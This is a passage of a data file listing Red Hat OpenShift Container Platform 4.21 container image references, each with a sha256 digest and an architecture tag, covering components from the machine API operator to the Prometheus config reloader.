"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
